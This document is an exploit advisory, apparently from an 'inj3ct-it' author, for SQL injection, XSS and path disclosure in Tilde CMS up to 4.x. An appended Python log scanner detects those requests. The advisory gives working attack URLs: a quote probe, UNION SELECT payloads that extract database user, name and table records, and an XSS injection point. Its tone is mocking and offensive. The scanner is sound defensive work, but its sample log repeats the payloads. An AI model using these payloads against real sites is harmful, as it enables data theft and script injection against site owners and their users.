---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

Do you need an explanation?!? I don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27

Little examples

Using the user() and database() functions you can get some information about the database, such as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or you can get some records from the database like:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*

Do you want the tables and the rows? Find them yourself ;P
---------------------------------------------------------------
Something else..

XSS Vulnerability

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------
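For defenders, an added example (not part of this advisory or of Tilde CMS) that flags the three request shapes above in web-server access logs: an "aarstal" value in mode=yeardetail that is not a plain four-digit year (quote or UNION/SELECT for SQL injection, "<" for XSS) and a "<" in the search parameter. The log lines and IP addresses are constructed samples, and the assumption that "aarstal" legitimately carries only a four-digit year follows from its Danish meaning ("year").

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=2006 HTTP/1.1" 200 5123
203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=%27 HTTP/1.1" 500 210
203.0.113.9 - - [10/Oct/2023:13:55:44 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* HTTP/1.1" 200 5300
203.0.113.9 - - [10/Oct/2023:13:55:50 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /tilde/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on HTTP/1.1" 200 940
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
YEAR_RE = re.compile(r'^\d{4}$')          # the only legitimate shape of "aarstal" (assumption)
SQLI_RE = re.compile(r'\bunion\b.*\bselect\b|\bselect\b.*\bfrom\b', re.I)


def classify(query: str) -> list:
    """Return the findings for one index.php query string (values are URL-decoded by parse_qs)."""
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    findings = []
    if params.get('mode') == 'yeardetail' and 'aarstal' in params:
        raw = params['aarstal']
        # Collapse the /**/ comment padding the PoC uses in place of spaces,
        # so the keyword check sees "999 union select ...".
        norm = re.sub(r'/\*.*?\*/|/\*', ' ', raw)
        if not YEAR_RE.match(raw):
            if "'" in raw or SQLI_RE.search(norm):
                findings.append('sqli:aarstal')
            if '<' in raw:
                findings.append('xss:aarstal')
            if not findings:
                findings.append('anomaly:aarstal-not-a-year')
    if params.get('mode') == 'search' and '<' in params.get('search', ''):
        findings.append('fpd:search')
    return findings


def scan_log(text: str) -> list:
    """Yield (client_ip, findings) for every index.php request that triggers a finding."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith('/index.php'):
            continue
        findings = classify(parts.query)
        if findings:
            hits.append((line.split(' ', 1)[0], findings))
    return hits


if __name__ == '__main__':
    for ip, findings in scan_log(SAMPLE_LOG):
        print(ip, ', '.join(findings))
```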